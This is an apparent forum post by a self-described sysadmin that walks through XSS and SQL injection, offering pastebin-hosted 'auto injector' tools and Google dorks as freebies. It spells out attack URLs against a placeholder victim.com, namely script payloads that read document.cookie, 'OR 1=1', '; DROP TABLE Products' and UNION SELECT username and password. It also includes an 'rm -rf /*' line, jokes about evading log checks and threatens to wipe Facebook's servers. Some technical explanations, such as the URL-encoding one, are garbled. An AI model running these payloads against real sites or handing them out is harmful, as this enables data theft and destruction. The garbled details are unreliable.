As a sysadmin and IT researcher by trade, I feel quite uncomfortable with daily news on Internet security's matters. And the amount of uncomfortable is growing, high. Being a sweet cellist and waffle-lover can't save my monthly payments too, apparently same for you...

Anon just struck a strike at prison's security system and Skype's payment page got exposed to XSS.

I make this post as a 'gift' to Newgrounders. Since I already endlessly rant about these stuff on other log/blog. This time I include all my past-private attack tools, as freebies.

This post is written for educational purposes. Use as your own risks. Use for your own morals.

My LinkedIn
Thomas.K's LinkedIn

Table of Contents:
What is XSS?
What is SQL Injection?

Question?
___________________

What is XSS?

- Cross-site-scripting OWASP is a form of code injection's attack when client(s) can perform unauthorized request that legitimately can only request by host/admin side(s).

Code vulnerable to injection: JavaScript, PHP, Perl, HTML
Uncommon codes: CSS, XML, ActionScript (Flash XSS)

+ Attack method:

= Direct-blind injection - Data/code enters directly on site's link via client's web browser. Pro = Anonymity. Con = Speed.
= Automatic-blind injection - Data/code enters by shellscript/program that requested randomized or all-blind scans on host site's source page(s). Pro = Speed and Accuracy. Con = Anonymity.
= Automatic-preciosity injection - Data/code inject directly on known vulnerable segment of codes. Usually attacker harvest direct target by Google hacking. Pro = Anonymity and Accuracy. Con = Super Slow.

// Impacts:

- Phishing - Since XSS requests can change and modify server side's source-page. Phishers can make scam pages for login, payment and even banking based on original pages. By directing you to their dens if you are too fucking dumb to look at the unusual link... oh wait they can fake URL too! By exploiting your browser.

- Session hijacking - Every time you visit a site, there are 'sessions' that indicate and log your present moments to certificate the authenticity's client side (cookies!) for private activities. With XSS, attackers can perform an authorized 'hitchhiking' or we call it Man-in-Middle on the joy ride with your present! Imagine they have joy rides with site administrator or your bank accounts... Slip right in the rides without problem!

- Site defacement - I think this is too goddamn common for all of us. Digital graffiti. Favourite past time attack for both mischief and hacktivist. Combined attack of those 2 above.

- XSS-DdoS attack - this is a new kind of Distributed Denial of Service attack. Distributed by Silencefreedom. With a simple Perl/PHP script launches from client side. By using fake/virtual presents on target site (Session hijack) to generate mass request. This could be much more effective than owning 10000 bots. Of course you get exposed in exchange. Proxy won't work effectively here.

- Flash XSS - I have to humbling to say that: Flash is not hardcoded like Adobe boasts around. It's still injectable and exploitable by direct scripts. However it's a long shot = not many easy targets in a somewhat-almost-hardcoded SWF interactive file. Still make me worry, especially sites like Newgrounds and Youtube, depend mostly on ActionScript's interaction.

Well, Justin Bieber's fans got their tastes from YouTube's Flash XSS by Anon.

Bonus: XSS goes well with SQL injection.

\\ Defence:

= Wrap all scripts! Watch out for straggling lines of code. Fire lazy web coders. Do monthly grey-box-tests. Log every client-side's activities. Simple.

(And don't fuck around with CSS too much, this make your attackers be happier. DeviantArt got their prices last year, mass unactivated account hacks via stupid XSS phishes. Fuck 'em.)

How's stuff Work:

Although I do run custom scripts on Metasploit and Burp Suite but I'm not gonna share much on this. I don't want to be a l33t mentor. I only show you the most simplest forms of exploitation methods. Same to SQL injection.

Direct injection.

http://www.victim.com/AdaptCMS/admin.php?view=/&
view=settings
http://www.victim.com/AdaptCMS/admin.php?view=/&
view=users
http://www.victim.com/AdaptCMS/admin.php?view=/&
view=groups
http://www.victim.com/AdaptCMS/admin.php?view=/&
view=levels
http://www.victim.com/AdaptCMS/admin.php?view=/&
view=stats

http://www.victim.com/AdaptCMS/admin.php?view=</
script><script>alert(document.cookie)</script>
http://www.victim.com/AdaptCMS/admin.php?view=sh are&do=</script><script>alert(document.cookie)</
script>
http://www.victim.com/AdaptCMS//?'</script><scri pt>alert(document.cookie)</script>
http://www.victim.com/AdaptCMS//index.php?'</scr ipt><script>alert(document.cookie)</script>

Breaking down:

http:// www.victim.com /AdaptCMS/ admin.php ?view=</script><script>alert(document.cookie)</s cript>

www.victim.com = Target site. Could be IP address.

AdaptCMS = web sandbox. Or public proxy.

admin.php = Admin pages. In PHP.

the rest = desired scripts to request vulnerability.

If any of the script you input, when the page responded with error not found or 404. BUT, with your input script either in the link bar or visible on the error page... you just have XXSed that page. Congrats.

The Sorrow:

I was also felt into a trap once when a fake Paypal page looks so real. I just almost logged in then realized the HTTPS is weird. Same to Gmail login. Finally realized my browser got hijacked to automatically direct me to those pages based upon my saved web data's caches. Fuck you IE.

Freebie: http://pastebin.com/2gFKFsDf (you may need an account to see it, just login with Gmail or Facebook)

Python script. Auto procedural injector. I wrote this a few days ago with Silencefreedom when after we recorded our 2nd latest song. This guy is a fucking genius, in both music and programming. Accurate on almost all targets. 87%. We have tested it, and trust it.

How to run: VIM/GEDIT > copy n paste > save as whatevername.py > python ./whatevername.py > Enjoy!

OR VIM/GEDIT > copy n paste > save as whatevername > bash ./whatevername

Google dorks: http://pastebin.com/mvugNEu4 (replace example targets with desired target(s))

Cheat Sheet at ha.cker.org

XSS-DdoS: PM us to get it. We don't like to distribute it for script kiddies.

What is SQL injection?

SQL - Structured Query Language, a database lang for data management, particulary web database and cross platform application(s).

There are many common SQL versions of lang: MySQL, PostgreSQL, Oracle, SQLite, PSQL, T-SQL and SQL PL
They all share similar syntax and commands.

SQL Injection - OWASP source attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Or - you can think of this as similarity to Cross site scripting. Injection.

Methods of Attact

Same as XSS. However with different syntaxs. SQL.

Also, you can inject either of those 2 into search bar, login bar, passwd bar or anywhere that you can type and Enter.

// Impacts:

SQL is the most common and popular type of exploitation for low hang fruit harvesters (Anon and LulzSec). And it's the hardest exploitation for systemadmins and security experts to manage and fix. So you can imagine how we systemadmins curse the inventors of SQL everyday... apparently made by MS and IBM reseacher... pooh poohed with LSD!

- Identity mugging - I call it 'hardcore-doxing'. Why? You can exploit SQL exploits with Google, Bing, Yahoo and other search engines. Web spider is a stalking bitch. Such as Google Analytic. Many goverment sites, especially Canada and UK, rarely disclose the private info such as email, name, health data, address/phone, gender/age; sometime even Social Number and bank numbers. The just put a weak login with tons of script error on it just to say 'they are secured, you are safe!'. Truth is, any script kiddo and newbie can get their hands on.

- Site defacement - rm -rf /*

Who got this? Stratfort, HB Gary, DigiNotar...

- Server 'rape' - I try to use jargon terms here. Rape = take everything... then throw it on Pastebin or ThePirateBay. Typical mischief who does these for the 'lulz'. The last thing you want is either they steal everything including the info about where you farted... or wipe clean you server(s).

Fun fact: Sometime Google search SELF-execute SQL/XSS errors and direct you directly to the treasures!

Hint: Just input the right codes and you can go around annoying Facebook CAPTCHA. Jail me Faceshit, just like you jailed the guy who helped you find your loophole. I'll make sure to rm -rf you root servers when fed knock on my door.

\\ Defence:

I don't want to claim the defence methods are right since I experiment with more 'valid' bugs than valid patches. Like I said, SQL exploit is like a bitch that on LSD... a wild mustang... on drugs.

Same as XSS prevention: Wrap all extra code parameters and segments. Use procedural code segments. Such as VulnerableDynamicSQL(@userName nvarchar()) and WRAP $tablename= mysql_real_escape_string($tablename) and column=?

command.Parameters.Add() can be critical if coder(s) leff-over and unclose text variables.

Avoid exposing sensitive special chars.

Strong advises: With XSS, SQL is a step easier to attack than ever. They are twin. So close one door and open another won't save your ass much.

How's stuff Work:

I have carefully selected the best and shortest tricks to give examples.

Advise: you may use vulnerability scanner to do sweep on target but unlikely to get an accurate pinpoint.

1=1,'true','false'
'data' OR '1'='1'

These two above are the most basic method of checking for bugs. Both are SELECT method.

Simple example:

SQL data:

sql_query= "
SELECT ProductName, ProductDescription
FROM Products
WHERE ProductNumber = " & Request.QueryString("ProductID")

Domain: http://www.victim.com/products/products.asp?prod uctid=123

Notice the id=123
In SQL injection, id is the query tag for sections of SQL data's storage. By simply blindly injecting numbers in the 'id=' tag combine with SQL sensitive codes you can check the vul.

Now let's rock the ship with 1=1

http://www.victim.com/products/products.asp?prod uctid=123 or 1=1

Actual URL shows:http://www.victim.com/products/products.as p?productid=123%2or%21=1 (why %2? It's the case which represents 'space' in HTML. URL don't allow spacing)

SQL data:

SELECT ProductName, Product Description
FROM Products
WHERE ProductNumber = 123 OR 1=1

We can use GET, POST and DROP methods in here.

http://www.victim.com/products/products.asp?prod uctid=123; DROP TABLE Products

SQL data:

SELECT ProductName, Product Description
FROM Products
WHERE ProductNumber = NULL

What's happened here? We just defaced the whole ProductName and everything on it! If you try GET, it will shows the available info. But not after DROP.

Alright, Rewind!

Let's try exposing the username and password only, shall we?

Assume the ProductName contains sensitive info.

SELECT ProductName, ProductDescription
FROM Products
WHERE ProductID = '123' UNION SELECT Username, Password FROM Users;

UNION is the 'cluster' link that channeling different queries together, here we have SELECT. So?

Here we go:

http://www.victim.com/products/products.asp?prod uctid=123 UNION SELECT user-name, password FROM USERS

:) The target's data is exposed. You can DROP 'em too... or GET or POST. Or SEND, but I don't encourage that...

XKCD should teach you well enough. Don't fuck with DROP... Ma favourite! (Shss... the teachers dunno how to check logs and caches, don't tell them!)

Teh Sorrow

Now you know how it feels like for us sysadmins. And how joyful is it for the attackers. SQL injection is worse than Planet X hitting the Earth at 12/12/2012, in my opinion.

I remember 7 months ago when one asshole tried to wipe out our logs and sensitive data that used to monitor oil dectector!! Fucking hubs heated above limited temp but no alarm. We use SCADA hardware that ran custom PSQL installation, apparently. Luckily the lead sysadmin still has a brain to use generated password. The attacker was somewhere in Turkey. Fucking wanker! I had to fill out long ass damage reports. 3 nights without rest.

We learned our lessons. Fix all other bugs. Wrap any sensitive code. Sweep grey-box and even black-box scans every 2-3 weeks. Do 'DROP hunt' every month. Honeypots.

Freebies:

Scanner by me.PHP. Login to view.
Auto Injector by Waffles (me) and Bin. Again, you need to login to view it. Perl.
SQLi Template by infodox, it's a good one. Perl.
Google Hacking/Dorks Put in the search engine.

SQLi Cheat Sheet http://ferruh.mavituna.com/sql-injection-cheatsh eet-oku/
SQLi on OWASP https://www.owasp.org/index.php/SQL_Injection

AND NOW: Ladies and Gens, let me show you the world most powerful SQL injector, by
Silencefreedom.

I'm still getting addicted when using it. Cover wide ranges from Oracle to PSQL. Fast but extremely critical. Used combined technique with XSS.

The jokes on IRC made by Silencefreedom turned out to be true. He's really a hardcore coder. Suck that he's haunting ass in music... he's good at it too!

Question?

Any humble question. Please leave it here or PM me. :3

If you really really have no clue at all then just PM me, I'll spend sometime try to explain them to you.

I hope you have learned something today.